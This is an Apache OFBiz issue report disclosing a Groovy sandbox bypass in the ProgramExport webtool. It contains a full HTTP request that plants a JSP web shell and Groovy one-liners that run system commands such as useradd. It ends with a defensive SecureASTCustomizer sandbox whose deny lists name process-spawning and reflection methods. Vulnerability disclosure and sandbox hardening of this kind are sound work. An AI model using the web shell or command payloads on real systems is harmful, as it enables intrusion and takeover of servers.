OFBiz / OFBIZ-12305

Groovy Program sandbox bypass


Details

    • Important

    Description

      Code location
      https://github.com/apache/ofbiz-framework/blob/trunk/framework/webtools/groovyScripts/entity/ProgramExport.groovy#L89-L92

      The check applied to the Groovy code here can easily be bypassed.

      a)
      The http packet is as follows:

      POST /webtools/control/ProgramExport HTTP/1.1
      Host: 127.0.0.1:8443
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:91.0) Gecko/20100101 Firefox/91.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Referer: https://127.0.0.1:8443/webtools/control/ProgramExport
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 925
      Origin: https://127.0.0.1:8443
      Connection: close
      Cookie: JSESSIONID=BC833071F17F30BE022A7D44A5BB78C5.jvm1; OFBiz.Visitor=10103; CookiePreferences=[]; login_username=admin; login_nickname=admin; UM_distinctid=178a633ad075a3-0853063891be59-445b6f-13c680-178a633ad087e9; displayTagDiv=false; Hm_lvt_e325e60ca4cd358f2b424f5aecb8021a=1621261771; careyshop-1.8.4-uuid=admin; careyshop-1.8.4-block=false
      Upgrade-Insecure-Requests: 1
      Sec-Fetch-Dest: document
      Sec-Fetch-Mode: navigate
      Sec-Fetch-Site: same-origin
      Sec-Fetch-User: ?1

      groovyProgram=// Use the List variable recordValues to fill it with GenericValue maps.
      // full groovy syntax is available

      import org.apache.ofbiz.entity.util.EntityFindOptions

      def x = "jsp"
      def f = "%"
      // JSP web shell: runs the "i" request parameter as a system command and returns its output
      def x2 = "<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print(\"<pre>\");while((a=in.read(b))!=-1){out.println(new String(b));}out.print(\"</pre>\");%>"

      // write the shell into a directory served as static content by the webapp
      def w_file = new File("/Users/master/Downloads/ofbiz-framework-release17.12.08/themes/common/webapp/images/123."+x)
      w_file.withWriter { writer -> writer.append(x2) }

      &submitButton=运行*

      In this way, the JSP trojan is uploaded.

      b)
      Use Groovy to execute system commands, bypassing the restriction.

      def process = "touch /tmp/xxx".execute()
      def process2 = "useradd vvv".execute()

      There are very mature Groovy sandbox solutions available; you can refer to them.
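As an added example, which is neither OFBiz's code nor part of this report, the following shows what a deny-by-default compile-time sandbox for a user-supplied Groovy program looks like, built on Groovy's own SecureASTCustomizer (Groovy 2.4/3.x setter names). It covers both bypass shapes above: the java.io.File write in (a) and the String.execute() process spawn in (b), plus a reflection variant. The helper names buildSandboxedShell and accepts, the denied-name lists, the allowed OFBiz class references, the four sample programs and the delegator/recordValues bindings they refer to are assumptions made for the demo; nothing is executed, only compiled.

```groovy
import org.codehaus.groovy.ast.expr.ClassExpression
import org.codehaus.groovy.ast.expr.ConstructorCallExpression
import org.codehaus.groovy.ast.expr.MethodCallExpression
import org.codehaus.groovy.ast.expr.PropertyExpression
import org.codehaus.groovy.control.CompilerConfiguration
import org.codehaus.groovy.control.MultipleCompilationErrorsException
import org.codehaus.groovy.control.customizers.SecureASTCustomizer

// Added example (not OFBiz code): a compile-time sandbox for user-supplied Groovy.
// The allow/deny lists below are assumptions chosen for this demo.
static GroovyShell buildSandboxedShell() {
    SecureASTCustomizer secure = new SecureASTCustomizer()

    // Explicit imports: only entity-API classes a ProgramExport script needs.
    // Empty lists forbid star and static imports entirely.
    Set<String> allowedClasses = ['org.apache.ofbiz.entity.util.EntityFindOptions',
                                  'org.apache.ofbiz.entity.condition.EntityCondition',
                                  'org.apache.ofbiz.entity.condition.EntityOperator'] as Set
    secure.importsWhitelist = allowedClasses as List
    secure.starImportsWhitelist = []
    secure.staticImportsWhitelist = []
    secure.staticStarImportsWhitelist = []

    // Method names that hand the host to the script: process spawning,
    // file writes, reflection and metaprogramming.
    Set<String> deniedMethods = ['execute', 'exec', 'getRuntime', 'withWriter', 'withOutputStream',
                                 'newWriter', 'newOutputStream', 'write', 'forName', 'getMethod',
                                 'getDeclaredMethod', 'invoke', 'newInstance', 'setMetaClass'] as Set
    Set<String> deniedConstructors = ['java.io.File', 'java.io.FileWriter', 'java.io.FileOutputStream',
                                      'java.io.RandomAccessFile', 'java.lang.ProcessBuilder'] as Set

    secure.addExpressionCheckers({ expr ->
        if (expr instanceof MethodCallExpression && expr.methodAsString in deniedMethods) return false
        if (expr instanceof ConstructorCallExpression && expr.type.name in deniedConstructors) return false
        // Static references (Runtime.getRuntime(), Class.forName(), System.exit()) must be allow-listed.
        if (expr instanceof ClassExpression && !(expr.type.name in allowedClasses)) return false
        // this.class / obj.metaClass are the usual springboards to reflection.
        if (expr instanceof PropertyExpression && expr.propertyAsString in ['class', 'metaClass']) return false
        return true
    } as SecureASTCustomizer.ExpressionChecker)

    CompilerConfiguration config = new CompilerConfiguration()
    config.addCompilationCustomizers(secure)
    return new GroovyShell(config)
}

// Compile only (shell.parse): the customizer runs during compilation, so a
// rejected program never executes. Returns true if the program was accepted.
static boolean accepts(GroovyShell shell, String program) {
    try {
        shell.parse(program)
        return true
    } catch (MultipleCompilationErrorsException | SecurityException e) {
        String reason = e.message.readLines().find { it.contains('not allowed') } ?: e.message
        println "rejected: ${reason.trim()}"
        return false
    }
}

GroovyShell shell = buildSandboxedShell()

// Constructed sample programs: one benign entity query, then the two shapes
// from the report (file write, process spawn) and a reflection variant.
String benign = 'recordValues.addAll(delegator.findAll("Party", false))'
String fileWrite = '''
    def w = new File("/tmp/123.jsp")
    w.withWriter { writer -> writer.append("<% out.print(1) %>") }
'''
String processSpawn = '"touch /tmp/xxx".execute()'
String reflection = 'this.class.forName("java.lang.Runtime").getRuntime().exec("id")'

assert accepts(shell, benign)
assert !accepts(shell, fileWrite)
assert !accepts(shell, processSpawn)
assert !accepts(shell, reflection)
println "sandbox demo finished"
```

Run it with the groovy launcher (groovy sandbox_demo.groovy). Two caveats a practitioner should keep in mind: SecureASTCustomizer inspects the AST at compile time only, so name-based deny lists can be sidestepped by dynamically built method names, invokeMethod dispatch, metaclass manipulation or classes obtained through other objects; and it does nothing about what an accepted program does at run time. That is why the mature approach is to pair an AST allow-list with a runtime interceptor such as the groovy-sandbox library used by Jenkins' script-security, and to run the script under a process account that cannot write into served webapp directories.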

          People

            Assignee: jleroux (Jacques Le Roux)
            Reporter: thiscodecc
            Votes: 0
            Watchers: 2
